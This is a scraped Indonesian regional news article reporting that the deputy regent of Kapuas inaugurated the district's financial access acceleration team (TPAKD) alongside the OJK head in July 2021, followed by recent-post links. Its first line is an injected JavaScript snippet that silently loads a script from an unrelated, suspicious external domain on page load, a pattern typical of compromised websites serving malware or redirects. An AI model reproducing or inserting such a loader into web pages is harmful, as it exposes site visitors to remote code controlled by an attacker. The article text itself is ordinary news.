(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Wabup Kapuas Kukuhkan TPAKD Kabupaten Kapuas


KANALKALIMANTAN. COM, KUALA KAPUAS – Wakil Bupati Kapuas Drs HM Nafiah Ibnor MM mengukuhkan Tim Percepatan Akses Keuangan Daerah (TPAKD) Kabupaten Kapuas tahun 2021.

Pengukuhan disaksikan langsung oleh Kepala Otoritas Jasa Keuangan (OKJ) Provinsi Kalteng Otto Fitriandy, Selasa (13/7/2021), di aula kantor Bupati Kapuas.

Kegiatan tersebut dihadiri oleh Sekretaris Daerah Kabupaten Kapuas Drs Septedy MSi, Asisten Perekonomian dan Pembangunan Salman, Kepala OPD dan Kepala Bagian terkait serta para undangan perbankan.

Wakil Bupati Kapuas, Drs H M Nafiah Ibnor menyampaikan sebagaimana diamanatkan dalam Undang-undang Nomor 21 Tahun 2011 tentang Otoritas Jasa Keuangan (OJK) merupakan lembaga negara yang independen dan memiliki fungsi menyelenggarakan sistem pengaturan dan pengawasan terhadap seluruh kegiatan sektor jasa keuangan, serta melaksanakan edukasi dan perlindungan konsumen (EPK) kepada masyarakat.

 

 

Baca juga: Polsek Sungai Tabuk Bekuk Tersangka Penganiayaan hingga Korban Meninggal di Sungai Bangkal

Dengan fungsi tersebut secara langsung maupun tidak langsung, OJK memiliki tanggung jawab untuk mendukung pertumbuhan ekonomi daerah dan nasional.

“Saya menyambut baik dan menyampaikan apresiasi kepada jajaran kantor OJK Provinsi Kalimantan Tengah dan pihak terkait, atas terbentuknya TPAKD Kabupaten Kapuas. Semoga inisiatif ini dapat memperkuat kerja sama antara Stakeholders, industri dan jasa keuangan di daerah,” ungkapnya.

Ia berharap, pembentukan TPAKD ini dapat membantu mengurangi dan mencegah ketimpangan perekonomian, dengan mendorong ketersediaan akses keuangan yang produktif seluas-luasnya kepada masyarakat.

Mendorong lembaga jasa keuangan untuk meningkatkan peran serta dalam pembangunan ekonomi daerah, serta mengoptimalkan potensi sumber keuangan daerah bagi perkembangan sektor UMKM.

“Jadirnya TPAKD ini, semoga dapat memetakan kebutuhan daerah dan memberikan masukan serta rekomendasi kebijakan kepada Pemerintah Kabupaten Kapuas yang extraordinary, inovatif dan cepat serta dapat mengembangkan potensi daerah terutama yang saat ini menjadi fokus program kerja pada beberapa bidang seperti sektor perikanan, pertanian dan sebagainya,” terangnya.

Baca juga: WASPADA! Covid-19 Kalsel Hari Ini Tambah 307 Orang, Banjarmasin Sumbang Kasus Terbanyak

Sementara itu, Ketua OJK Provinsi Kalteng, Otto Fitriandy menyampaikan ucapan terima kasih kepada Pemerintah Kabupaten Kapuas yang telah menginisiasi pengukuhan TPAKD di Kapuas.

Ia berharap adanya TPAKD ini dapat mendorong ketersediaan akses keuangan yang seluas-luasnya terhadap masyarakat, dalam rangka membuka akses keuangan yang lebih produktif, serta mendorong lembaga jasa keuangan untuk meningkatkan peran serta pembangunan ekonomi.

“Sekaligus mendorong pengoptimalan potensi sumber dana untuk mengembangkan UMKM dan pembiayaan pembangunan sektor prioritas. Tugas TPAKD juga melakukan koordinasi di antara stakeholder terkait guna menjamin perluasan akses keuangan di daerah,” pungkasnya. (kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Risa

Recent Posts

Pj Bupati Kapuas Halalbihalal Bersama Ibu-ibu Pengajian

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi menghadiri acara halalbihalal gabungan pengajian… Read More

38 menit ago

Pansus II ke KLHK, Bahas Raperda Pengakuan dan Perlindungan Masyarakat Hukum Adat

KANALKALIMANTAN.COM, KUALA KAPUAS - Panitia Khusus (Pansus) II DPRD Kabupaten Kapuas melakukan kunjungan ke Kementerian… Read More

43 menit ago

Rugikan Negara Rp1,6 Miliar, Kasus Pengemplang Pajak Dilimpahkan ke Kejari Tanbu

KANALKALIMANTAN.COM, BANJARMASIN - Seorang lelaki asal Kabupaten Tanah  Bumbu (Tanbu) Provinsi Kalimantan Selatan (Kalsel) berinisal… Read More

52 menit ago

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

12 jam ago

Rekayasa Pemasangan ATCS, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

13 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

14 jam ago

This website uses cookies.